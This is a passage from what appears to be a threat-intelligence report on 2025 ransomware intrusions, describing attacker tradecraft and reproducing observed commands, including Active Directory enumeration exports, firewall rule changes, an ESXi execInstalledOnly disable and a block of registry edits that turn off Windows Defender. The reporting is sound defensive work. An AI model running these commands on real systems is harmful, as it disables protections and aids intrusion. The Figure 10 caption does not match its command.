<p><span>In 2025, the tactics leveraged for internal reconnaissance remained fairly consistent with recent years; threat actors continued to rely on native system utilities, PowerShell commands, and publicly available software.</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>Threat actors consistently used PowerShell to query Active Directory (AD) objects for running processes, network shares, and user group memberships. This activity ranged from using native cmdlets like Get-ADComputer and Get-ADUser to using script blocks to query other system data.</span></p>
</li>
<ul>
<li aria-level="2">
<p role="presentation"><span>In several cases, threat actors used Get-ADComputer and Get-ADUser to export lists of AD objects to a separate file. For example, in an incident involving MEDUSALOCKER.V2, the threat actors queried specific user object properties, exported account identity, contact information, and organizational metadata (Figure 8). At the same incident, the threat actors executed a different command to query domain-joined computers, capturing properties such as the operating system (OS), IPv4 address, and last logon date (Figure 9).</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>In some instances, threat actors executed PowerShell script blocks that ran a multitude of commands at once. For example, in an INTERLOCK incident, the threat actors ran a condensed one-line script that performed user profiling—including identifying the current user's username, Security Identifier (SID), and group memberships—checked for a domain connection, and enumerated the Domain Admins group. Notably, the script included a jitter, or time delay, to create random pauses between command execution, likely in an attempt to evade detection against rapid-fire command execution.</span></p>
</li>
</ul>
<li aria-level="1">
<p role="presentation"><span>Threat actors continued to rely heavily on internal Windows utilities in this phase of the attack lifecycle, including ipconfig, netstat, ping, and nltest, among others.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Publicly available reconnaissance utilities were used in numerous intrusions. These publicly available tools ranged from those specialized in probing networks, such as Advanced IP Scanner, Softperfect Network Scanner (NETSCAN), and Angry IP Scanner, to red-teaming tools like PowerSploit and IMPACKET. Notably, network reconnaissance utilities like Advanced IP Scanner, NETSCAN, and Angry IP Scanner were used in approximately 50% of intrusions, similar to their observed usage in 2023 and 2024.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>We often saw threat actors accessing files and folders related to potentially sensitive information. In some cases, they appeared to search for backup scripts and password managers, while in other cases they were likely attempting to find sensitive files to exfiltrate in order to increase the pressure applied by data theft extortion.</span></p>
</li>
<ul>
<li aria-level="2">
<p role="presentation"><span>In a REDBIKE intrusion, the threat actors searched for keywords like "passport," "i9," and "cyber insurance." In addition to searching for personally identifiable information (PII) like passports and employment eligibility forms, it is plausible that the threat actors were also seeking to obtain the victim's cyber insurance policies to help them determine a negotiation strategy or maximum ransom amount to demand.</span></p>
</li>
</ul>
<li aria-level="1">
<p role="presentation"><span>Several threat actors performed targeted internal reconnaissance for information about virtualized infrastructure within the victim environment, likely to facilitate ransomware deployment on these systems. In a REDBIKE incident, threat actors enumerated hypervisors by running the Get-VM cmdlet and accessed the internal VMware vSphere web portal.</span></p>
</li>
</ul></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>powershell Import-Module ActiveDirectory; Get-ADUser -filter * -properties Enabled,DisplayName,Mail,SAMAccountName,homephone,ipphone,TelephoneNumber,comment,description,title | select Enabled,DisplayName,Mail,SAMAccountName,homephone,ipphone,TelephoneNumber,comment,description,title | export-csv C:\Users\Public\Music\users.csv </code></pre>
<p><span>Figure 8: Get-ADUser HostCmd</span></p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>powershell Import-Module ActiveDirectory; Get-ADComputer -Filter {enabled -eq $true} -properties *|select comment, description, Name, DNSHostName, OperatingSystem, LastLogonDate, ipv4address | Export-CSV C:\users\public\music\AllWindows.csv -NoTypeInformation -Encoding UTF8</code></pre>
<p><span>Figure 9: Get-ADComputer HostCmd</span></p></div>
<div class="block-paragraph_advanced"><h4><span>Lateral Movement</span></h4>
<p><span>Throughout 2025, actors extensively used common built-in protocols, including RDP, Server Message Block (SMB), and Secure Shell (SSH), combined with compromised credentials or attacker-created accounts for lateral movement. We also observed actors leveraging a variety of tools and utilities to tunnel and proxy traffic within victim environments.</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>In approximately 85% of intrusions, threat actors leveraged RDP with either compromised or attacker-created accounts for lateral movement.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Across a range of incidents we observed threat actors leveraging SMB for lateral movement to access network shares, stage payloads, and execute remote commands.</span></p>
</li>
<ul>
<li aria-level="2">
<p role="presentation"><span>During one SAFEPAY ransomware incident, the threat actor leveraged SMB to access various network shares and used this access to stage a copy of NETSCAN on multiple hosts.</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>We also observed multiple actors leverage IMPACKET.SMBEXEC to execute remote commands. For example, in one intrusion leading to MEDUSALOCKER.V2 ransomware, the threat actor leveraged IMPACKET.SMBEXEC to run commands to create a new local administrator account on a remote host.</span></p>
</li>
</ul>
<li aria-level="1">
<p role="presentation"><span>Across numerous incidents we observed various threat actors leverage common public utilities like PuTTY and KiTTY to establish SSH connections to hosts, particularly when moving laterally to ESXi systems.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>We continued to observe frequent use of common Windows utilities like PsExec, Windows Remote Management (WinRM), and to a lesser extent Windows Management Instrumentation Command-line (WMIC), for remote execution and lateral movement.</span></p>
</li>
<ul>
<li aria-level="2">
<p role="presentation"><span>In a handful of intrusions, threat actors used PowerShell to establish interactive remote sessions via WinRM using the "Enter-PSSession" cmdlet.</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>In an UNC5774 INTERLOCK ransomware incident, the threat actors used WinRM to establish a connection to a domain controller and execute remote commands, including using net.exe to reset the password of a user account.</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>During an UNC2465 incident, the threat actor moved laterally by using WMIC to execute a SMOKEDHAM payload on a remote host.</span></p>
</li>
</ul>
<li aria-level="1">
<p role="presentation"><span>In numerous incidents, threat actors manipulated firewall rules in order to enable different types of traffic, such as RDP or SMB, to be allowed within the victim environment.</span></p>
</li>
<ul>
<li aria-level="2">
<p role="presentation"><span>In one incident, UNC6021, a suspected FIN6 threat cluster, created a scheduled task that ran a netsh command to modify firewall rules to enable remote desktop access (Figure 10).</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>During one UNC6276 intrusion, the threat actor disabled the firewall on an ESXi host before deploying SYSTEMBC.LINUX on the host.</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>In one incident the threat actor installed OpenSSH on a host and ran a PowerShell command to configure a new firewall rule to allow inbound traffic on port 22 (Figure 11).</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>In an intrusion leading to the deployment of INC ransomware, the threat actor leveraged an attacker-created account to create new firewall policies that granted access to multiple additional subnets within the network.</span></p>
</li>
</ul>
<li aria-level="1">
<p role="presentation"><span>Threat actors leveraged a variety of malicious and legitimate utilities to tunnel and proxy traffic within victim networks, including SYSTEMBC, VIPERTUNEL, PYSOXY, CLOUDFLARED, and OpenSSH. During one LOCKBIT.WARLOCK intrusions the threat actor leveraged CLOUDFLARED to tunnel an RDP connection between two hosts.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>In a minimal number of incidents, threat actors leveraged publicly available post-exploitation tools including METASPLOIT and AMNESIAC.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Threat actors often abused access to various management consoles for virtual systems to move laterally to virtual hosts. </span></p>
</li>
<ul>
<li aria-level="2">
<p role="presentation"><span>In multiple instances, the threat actors appeared to leverage this access to enable SSH on ESXi hosts prior to establishing SSH connections for lateral movement. For example, in a FOULFOG.LINUX incident, threat actors leveraged access from the victim's VMware vSphere centralized management portal to enable SSH on a vm-host, created user root1, SSHed using the newly created user, and disabled firewall.</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>During one incident the threat actor leveraged access to the victim's Nutanix Prism Central management tool along with a compromised account to move laterally to multiple additional systems. In the same incident, the threat actor also used the VMware web user interface to access numerous ESXi hosts.</span></p>
</li>
</ul>
<li aria-level="1">
<p role="presentation"><span>In a subset of intrusions we observed evidence of threat actors conducting bruteforce attacks to gain access to accounts on additional systems.</span></p>
</li>
</ul></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>cmd.exe /C netsh advfirewall firewall set rule group="remote desktop" new enable=No</code></pre>
<p><span>Figure 10: netsh command to modify firewall rules to enable remote access</span></p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>powershell.exe -Command New-NetFirewallRule -Name sshd -DisplayName 'OpenSSH Server (sshd)' -Enabled True -Direction Inbound -Protocol TCP -Action Allow -LocalPort 22</code></pre>
<p><span>Figure 11: PowerShell command to allow inbound SSH traffic</span></p></div>
<div class="block-paragraph_advanced"><h4><span>Complete Mission</span></h4>
<p><span>The following sections highlight observations from the complete mission phase of the attack lifecycle, covering ransomware deployment, data exfiltration, and anti-analysis and recovery techniques. Threat actors conducting ransomware attacks routinely conduct multifaceted extortion operations involving data theft as it provides additional leverage during negotiations. Threat actors also consistently engage in a diverse range of tactics to ensure the success of their operations and reduce the ability for victims to recover, including tampering with security software, deleting backups, and clearing logs. Notable trends in 2025 include the prevalence of REDBIKE ransomware, an increase in the percentage of incidents involving data theft extortion, and indications that the techniques used to target virtual systems may be maturing.</span></p>
<h4><span>Ransomware Families</span></h4>
<p><span>REDBIKE was the most prominent ransomware observed in 2025 Mandiant incident response investigations, followed by AGENDA and then INC ransomware (Figure 12). In 2024, REDBIKE was tied for the number one spot with LOCKBIT.BLACK and RANSOMHUB; however, in 2024 LOCKBIT experienced significant disruptive actions stemming from law enforcement actions and in 2025 RansomHub abruptly ceased operations. Throughout 2025 we also observed a handful of incidents involving newly identified ransomware, such as NINTHBEE and SILVERPINE, demonstrating that at least a subset of threat actors are developing and maintaining new ransomware families.</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>REDBIKE was seen in almost 30% of 2025 ransomware incidents, surpassing previous highs for single ransomware families, including LOCKBIT and ALPHV reaching 17% each in 2023.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>We continue to observe threat actors reusing existing ransomware families in seemingly unrelated operations conducted under different extortion brands.</span></p>
</li>
<ul>
<li aria-level="2">
<p role="presentation"><span>While we have seen a significant decrease in LOCKBIT ransomware incidents since the legal actions taken against the RaaS in 2024, in 2025 we did observe a handful of LOCKBIT.WARLOCK incidents. The WarLock DLS emerged in July 2025 and has listed over 75 victims since. LOCKBIT.WARLOCK largely leverages the original LOCKBIT codebase; however, it uses different encryption algorithms, and refactors previously inlined operations into dedicated functions.</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>In 2025, we observed a handful of intrusions involving CONTI ransomware, though the CONTI RaaS was shut down in May 2022 following the leak of associated chat logs and the CONTI source code. For example, we observed CONTI deployed in a 2025 incident associated with the Gunra ransomware group; analysis of the ransomware payload identified it was heavily based on CONTI's source code, with slight variations in obfuscation.</span></p>
</li>
</ul>
<li aria-level="1">
<p role="presentation"><span>We observed three different extortion brands leveraging INC ransomware in their operations: INC Ransom, Sinobi, and Lynx. The INC ransomware source code was advertised in an underground forum in May 2024 but the Lynx and INC Ransom DLS domains were acquired by a common threat actor.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>GTIG observed ODDSIDE ransomware in an incident in 2025; ODDSIDE is PowerShell-based ransomware that refers to itself as DARKMATTER. While not completely unheard of, PowerShell-based ransomware is fairly rare.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Notably, in one incident we observed threat actors deploy CLOP ransomware. This is the first time we’ve responded to a CLOP ransomware incident since 2020, though we have occasionally identified CLOP ransomware samples uploaded to malware repositories. In recent years, threat actors associated with the CL0P data leak site have primarily conducted data-theft-extortion-only operations rather than performing encryption.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>In a subset of incidents, we were unable to obtain the ransomware payloads. For example, we observed a handful of TridentLocker-branded ransomware incidents in which there is evidence to suggest that the ransomware payload was executed in memory. It's plausible the threat actors used in-memory execution to deploy ransomware to try and bypass security detections and potentially make analysis and recovery efforts more difficult.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Threat actors occasionally abuse legitimate encryption tools in their extortion operations. In 2025, we observed an incident in which threat actors used BitLocker to encrypt over 200 remote hosts.</span></p>
</li>
</ul></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/2025-ransomware-trends-fig12.max-1000x1000.png" alt="Distribution of ransomware families observed in 2025 investigations">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="fy140">Figure 12: Distribution of ransomware families observed in 2025 investigations</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><div align="center">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table border="1px" cellpadding="16px"><colgroup><col><col><col></colgroup>
<tbody>
<tr>
<td colspan="3">
<p><strong><span>Ransomware Families Observed in 2025 Mandiant Investigations</span></strong></p>
</td>
</tr>
<tr>
<td>
<p><span>AGENDA</span></p>
<p><span>AGENDA.ESXI</span></p>
<p><span>AGENDA.RUST</span></p>
</td>
<td>
<p><span>BABUK</span></p>
<p><span>BABUK.MARIO</span></p>
</td>
<td>
<p><span>CLOP</span></p>
</td>
</tr>
<tr>
<td>
<p><span>CONTI</span></p>
</td>
<td>
<p><span>CRYTOX</span></p>
</td>
<td>
<p><span>DOLLARLOCKER</span></p>
</td>
</tr>
<tr>
<td>
<p><span>FOULFOG.LINUX</span></p>
</td>
<td>
<p><span>INC</span></p>
<p><span>INC.LINUX</span></p>
</td>
<td>
<p><span>INTERLOCK</span></p>
</td>
</tr>
<tr>
<td>
<p><span>LOCKBIT.UNIX</span></p>
<p><span>LOCKBIT.WARLOCK</span></p>
</td>
<td>
<p><span>MEDUSALOCKER.V2</span></p>
</td>
<td>
<p><span>NINTHBEE</span></p>
</td>
</tr>
<tr>
<td>
<p><span>NITROGEN</span></p>
</td>
<td>
<p><span>ODDSIDE</span></p>
</td>
<td>
<p><span>PLAYCRYPT</span></p>
</td>
</tr>
<tr>
<td>
<p><span>RANSOMHUB</span></p>
</td>
<td>
<p><span>REDBIKE</span></p>
</td>
<td>
<p><span>RHYSIDA</span></p>
</td>
</tr>
<tr>
<td>
<p><span>RIFTTEAR</span></p>
</td>
<td>
<p><span>SAFEPAY</span></p>
</td>
<td>
<p><span>SILVERPINE</span></p>
</td>
</tr>
<tr>
<td>
<p><span>WHITERABBIT</span></p>
</td>
<td> </td>
<td> </td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<span>Table 3: Ransomware families observed in Mandiant's 2025 incident response investigations</span></div></div>
<div class="block-paragraph_advanced"><h4><span>Data Exfiltration</span></h4>
<p><span>In 2025, we observed confirmed or suspected data theft in approximately 77% of ransomware intrusions, a notable increase from approximately 57% in 2024. In these incidents, the most frequently observed strategies for identifying, staging, and exfiltrating data included the use of legitimate data synchronization tools such as Rclone and MEGASync, file compression using built-in tools or portable versions of WinRar or 7Zip, and FTP clients such as Filezilla or Winscp.</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>During intrusions where data was stolen, we routinely observed threat actors targeting a variety of sensitive data types, including legal, human resources, accounting, and business development data.</span></p>
</li>
<ul>
<li aria-level="2">
<p role="presentation"><span>We observed evidence of threat actors conducting manual reconnaissance of systems likely to gather sensitive data for exfiltration such as accessing emails and attempting to access SharePoint and other Microsoft 365 environments via the browser.</span></p>
</li>
</ul>
<li aria-level="1">
<p role="presentation"><span>In 2025, threat actors continued to rely on publicly available tools and utilities—including Rclone, MEGASync, Megatools, restic, and possibly Cyberduck—to exfiltrate data.</span></p>
</li>
<ul>
<li aria-level="2">
<p role="presentation"><span>We observed Rclone in approximately 28% of intrusions where data theft was confirmed or suspected to exfiltrate data to attacker-controlled infrastructure.</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>In one INC ransomware incident, the threat actor used the wget and curl commands to download Rclone and an INC.LINUX ransomware payload respectively to a network-attached storage (NAS) server. The threat actor subsequently ran Rclone to exfiltrate data from the server prior to manually executing the INC.LINUX payload.</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>Threat actors installed and/or leveraged legitimate FTP/SFTP clients in 26% of intrusions where data theft was observed or suspected. Commonly observed software included FileZilla, WinSCP, and PuTTY Secure Copy.</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>While not confirmed to be used for data exfiltration, we observed threat actors installing and/or executing various utilities that could be used to aid in the reconnaissance, staging, and export of stolen data such as Total Commander, Xcopy, and Gpg4win.</span></p>
</li>
</ul>
<li aria-level="1">
<p role="presentation"><span>Threat actors leveraged a myriad of legitimate cloud services and infrastructure to exfiltrate stolen data, including Azure, AWS, Backblaze, Cloudzy, Filemail, Google Drive, and MEGA, and OneDrive.</span></p>
</li>
<ul>
<li aria-level="2">
<p role="presentation"><span>In one UNC5471 intrusion leading to AGENDA ransomware, the threat actor leveraged batch scripts alongside WinRAR to automate the archiving of files in directories. The actor then used Megatools and SLEETSEND to exfiltrate the data to the MEGA and Cloudzy cloud storage services.</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>We observed multiple threat actors transferring stolen data to attacker-controlled OneDrive accounts. During one UNC5496 intrusion, the threat actor ran commands to have Rclone transfer all files that matched a list of common file extension types to a threat actor-controlled OneDrive account.</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>In multiple incidents, we observed threat actors leveraging AzCopy to transfer stolen files to attacker-controlled Azure storage.</span></p>
</li>
</ul>
<li aria-level="1">
<p role="presentation"><span>During one UNC6098 intrusion, the threat actor leveraged the SQL Server Import and Export Wizard to export a SQL database.</span></p>
</li>
</ul>
<h4><span>Ransomware Deployment</span></h4>
<p><span>We observed a diverse set of ransomware deployment techniques leveraged in intrusions throughout 2025. Threat actors employed both manual and automated deployment techniques, including the use of batch scripts, scheduled tasks, Group Policy Objects (GPOs), registry keys, and PowerShell scripts. Notably, in almost 20% of incidents, threat actors targeted virtualization infrastructure, and we observed multiple incidents where operators automated portions of their ransomware deployment against ESXi hosts, suggesting techniques used to target virtual systems may be maturing.</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>Threat actors often relied on automated mechanisms to deploy ransomware. In many cases, they relied on native Windows mechanisms to facilitate ransomware execution.</span></p>
</li>
<ul>
<li aria-level="2">
<p role="presentation"><span>Multiple threat clusters leveraged batch scripts to facilitate ransomware payload execution in victim environments. In one LOCKBIT.WARLOCK intrusion, the threat actor staged NetExec on a domain controller along with files to run the ransomware payload. The threat actor then used NetExec to copy a batch file to numerous hosts via SMB and run it to execute the ransomware payload.</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>In a separate LOCKBIT.WARLOCK intrusion, the threat actor staged ransomware payloads on multiple hosts via SMB before executing them via scheduled tasks.</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>During a NINTHBEE ransomware incident, the threat actor modified a GPO to include a malicious scheduled task that disabled Windows Defender and subsequently executed the ransomware payload. In the same intrusion, the threat actor also attempted to execute the NINTHBEE payload on multiple remote hosts via PsExec.</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>In an incident likely involving DOLLARLOCKER, a threat actor created a Windows service to run a command to execute the ransomware payload.</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>Multiple threat clusters leveraged the Windows Registry to complete their ransomware deployment objectives. During an UNC5471 intrusion, the threat actor created registry Run keys to execute AGENDA ransomware on multiple servers persistently. In one INTERLOCK ransomware intrusion, following encryption, the threat actor modified the LegalNoticeCaption and LegalNoticeText registry values to display a banner indicating the system was ransomed on start up.</span></p>
</li>
</ul>
<li aria-level="1">
<p role="presentation"><span>In addition to using SMB to stage ransomware payloads, we also observed threat actors leverage SMB to facilitate more expansive ransomware deployment across victim networks. In one incident, actors identified network shares via the "Invoke-ShareFinder" PowerShell cmdlet and likely supplied this list to REDBIKE as a list of targets. Ultimately, encryption was attempted on more than 500 endpoints via SMB.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>In a small subset of observed intrusions, threat actors leverage PowerShell to automate the deployment of BitLocker encryption across victims' environments. During one intrusion, the threat actor used a PowerShell script to install, configure, and assign passwords for BitLocker on multiple hosts. The threat actor then enabled encryption on multiple drives on these hosts and scheduled a system restart to force the hosts into a locked state. The actor also modified the registry to display a ransom note on the BitLocker preboot recovery screen.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>In approximately 43% of ransomware intrusions we responded to in 2025, the threat actors were observed targeting virtualization infrastructure, an increase from 29% in 2024. While ransomware deployment to virtual systems is often done manually, in 2025 we observed at least some incidents where threat actors attempted to automate portions of the ransomware deployment stage.</span></p>
</li>
<ul>
<li aria-level="2">
<p role="presentation"><span>During an UNC5495 intrusion, the threat actor automated the deployment of BABUK.MARIO by leveraging a batch script that accepted credentials for ESXi hosts. The batch script used a staged copy of KiTTY to copy the ransomware payload to the host and then connect via SSH and run a command to execute the payload on each host. In a separate intrusion, a threat actor leveraged a PowerShell script to authenticate to the victim's vCenter server, set new root passwords, and enable SSH on ESXi hosts. The same script was used to subsequently copy a RIFTEAR ransomware payload to the hosts, delete backups, shutdown virtual machines (VMs), and disable security policies prior to executing the ransomware payload.</span></p>
</li>
</ul>
<li aria-level="1">
<p role="presentation"><span>Prior to ransomware deployment on ESXi hosts, threat actors commonly disabled the ExecInstalledOnly setting on hosts to allow for the execution of custom binaries (Figure 13). During one intrusion, the threat actor also accessed a vCenter server and modified the Lockdown Mode Exception Users settings, which controls users that are allowed to maintain privileges when the host is in lockdown mode.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Across multiple intrusions, threat actors took steps to stop virtual machines and unlock files prior to decryption, almost certainly to maximize the impact of their ransomware payloads.</span></p>
</li>
<ul>
<li aria-level="2">
<p role="presentation"><span>In multiple instances threat actors used or attempted to use IOBIT, a legitimate uninstaller utility, to unlock files in use by other programs prior to executing ransomware payloads.</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>We also observed multiple actors shutting down virtual machines and deleting backups and snapshots prior to encryption. In at least one intrusion, an actor leveraged a PowerShell script to automate the process of powering off virtual machines.</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>During one intrusion, the threat actor accessed the victim's Commvault server and deleted vCenter backup volumes prior to encryption to hinder recovery.</span></p>
</li>
</ul>
<li aria-level="1">
<p role="presentation"><span>During a TridentLocker-branded ransomware incident, we assess with moderate confidence that the threat actor leveraged the same CrushFTP preview hijacking technique used for WAVECALL persistence to download and execute a ransomware payload from the WAVECALL C2 server.</span></p>
</li>
</ul></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>esxcli system settings advanced set -o /User/execInstalledOnly -i 0</code></pre>
<p><span>Figure 13: Command to disable ExecInstalledOnly setting on ESXi hosts</span></p></div>
<div class="block-paragraph_advanced"><h4><span>Anti-Detection, Analysis, and Recovery Tactics</span></h4>
<p><span>Ransomware actors consistently engage in anti-detection, anti-analysis, and anti-recovery tactics in their operations in an effort to not only prevent detection during the intrusion, but increase the difficulty for victims to recover post-encryption. While these tactics are often manually performed by threat actors, numerous ransomware families feature built-in capabilities to hinder analysis and delete backups prior to encryption.</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>Threat actors consistently disabled and tampered with security controls during ransomware intrusions to avoid detection and/or block of execution of malicious payloads. Most commonly, we observed threat actors disabling Windows Defender, often by modifying the Windows registry. In some other cases, the threat actors modified Defender configurations via the Set-MpPreference PowerShell cmdlet to add exclusions for their malware and ransomware payloads. Threat actors also were observed leveraging GPOs, scheduled tasks, and PowerShell scripts in order to tamper with a variety of security controls.</span></p>
</li>
<ul>
<li aria-level="2">
<p role="presentation"><span>In a REDBIKE incident, threat actors used PowerShell to disable a multitude of Windows Defender features by running commands to modify a variety of values associated with Windows Defender registry keys, including DisableRealtimeMonitoring, DisableScanOnRealtimeEnable, and DisableOnAccessProtection (Figure 14).</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>In an intrusion involving WHITERABBIT, threat actors executed a Base64-encoded PowerShell command that used the "Add-MpPreference" cmdlet to modify the Defender Exclusion list to include the ransomware binary; a variety of file extensions, such as ".cmd," ".bat," and ".exe"; as well as User Data folders.</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>In an incident involving NINTHBEE, threat actors registered a scheduled task to execute daily a command that disables Microsoft Defender's real-time scanning for downloaded files and email attachments.</span></p>
</li>
</ul>
<li aria-level="1">
<p role="presentation"><span>Ransomware actors often deleted artifacts and cleared event logs to remove evidence of their activity. These records included information about command execution, firewall traffic, and stolen credentials. The wevtutil utility was used to facilitate log deletion in multiple instances.</span></p>
</li>
<ul>
<li aria-level="2">
<p role="presentation"><span>In a FOULFOG.LINUX incident, the threat actors renamed the ransomware binary to a less suspicious name, "filerw"; deleted the command history for the system; and created an empty file to replace the deleted file.</span></p>
</li>
</ul>
<li aria-level="1">
<p role="presentation"><span>In some cases, threat actors used benign names in their operations in an attempt to masquerade as legitimate software or system resources. For example, in a RIFTTEAR incident, threat actors registered a scheduled task named "\Microsoft\Update" to execute a malicious command likely intended to kill endpoint detection and response (EDR) processes. In a separate case involving CONTI, the ransomware binary had its filename renamed from "enc_lin" to "rsync" in an attempt to appear as the native synchronization command-line utility.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Ransomware actors often disabled or deleted backups to inhibit and/or limit recovery options. In some cases, threat actors stopped backup servers and/or deleted Volume Shadow Copies (VSS) via PowerShell scripts.</span></p>
</li>
<ul>
<li aria-level="2">
<p role="presentation"><span>Notably, in a RANSOMHUB incident, the threat actors used the access to Cisco Integrated Management Controller (CIMC) to map a Debian Linux ISO image via Virtual Media across a nine-node Cohesity cluster. By modifying the boot priority and hardware power-cycling, the nodes booted into the external Linux environment, overwriting the Cohesity operating system (OS) and rendering the backup data inaccessible.</span></p>
</li>
</ul>
<li aria-level="1">
<p role="presentation"><span>In a handful of intrusions, the threat actors used tooling to terminate processes and services associated with security software solutions, specifically those abusing signed kernel mode drivers. Examples include the open-source TERMINATOR and WATCHDOGKILLER, as well as non-publicly available tools such as WARCLAW, a utility that decodes and installs a vulnerable kernel mode driver.</span></p>
</li>
</ul></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>cmd.exe /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f 

cmd.exe /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f 

cmd.exe /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f 

cmd.exe /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f 

cmd.exe /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f 

cmd.exe /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f 

cmd.exe /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f

cmd.exe /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f

cmd.exe /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1"

cmd.exe /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f

cmd.exe /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f

cmd.exe /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f</code></pre>
<p><span>Figure 14: Windows Defender registry key modification</span></p></div>
<div class="block-paragraph_advanced"><h4><span>Tool Prevalence</span></h4>
<p><span>Throughout 2025, we continued to see ransomware actors rely heavily on publicly available tools and legitimate software across various stages of ransomware intrusions. While legitimate software remains popular, we observed a slight decrease in the use of RMM tools and post-exploitation C2 frameworks. Notably, both WinRAR and Rclone were observed in almost one-fourth of incidents, likely corresponding with the increase in incidents involving data theft, given that these tools are regularly used to stage and exfiltrate data respectively.</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>Threat actors used post-exploitation C2 frameworks in about 15% of 2025 ransomware incidents, a decrease from almost 20% in 2024. The decline in the use of post-exploitation frameworks is largely due to the continued reduction in use of Cobalt Strike BEACON.</span></p>
</li>
<ul>
<li aria-level="2">
<p role="presentation"><span>Cobalt Strike BEACON was deployed in only 2% of 2025 ransomware incidents, continuing a multi-year downward trend; in 2021 roughly 60% of ransomware incidents involved BEACON, dropping to around 38% in 2022, 20% in 2023, and 11% in 2024. This decrease could in part be attributed to some subset of actors exploring new frameworks, like AdaptixC2.</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>We observed approximately 8% of intrusions involving the AdaptixC2 (ADAPTAGENT) post-exploitation framework. </span><a href="https://unit42.paloaltonetworks.com/adaptixc2-post-exploitation-framework/" rel="noopener" target="_blank"><span>AdaptixC2</span></a><span> is an open-source post-exploitation framework developed for penetration testers; however, similar to the use of CobaltStrike for many years, threat actors often abuse these types of pentesting tools to facilitate their operations.</span></p>
</li>
<li aria-level="2">
